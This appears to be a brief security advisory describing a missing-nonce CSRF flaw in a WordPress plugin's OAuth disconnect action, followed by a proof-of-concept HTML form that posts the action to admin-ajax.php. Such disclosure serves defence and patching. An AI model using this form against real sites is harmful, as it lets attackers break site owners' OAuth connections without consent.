The wp_ajax_nf_oauth_disconnect from the plugin had no nonce protection making it possible for attackers to craft a request to disconnect a site’s OAuth connection.
<html>
<body>
<form action="https://[URL_HERE]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="nf_oauth_disconnect" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>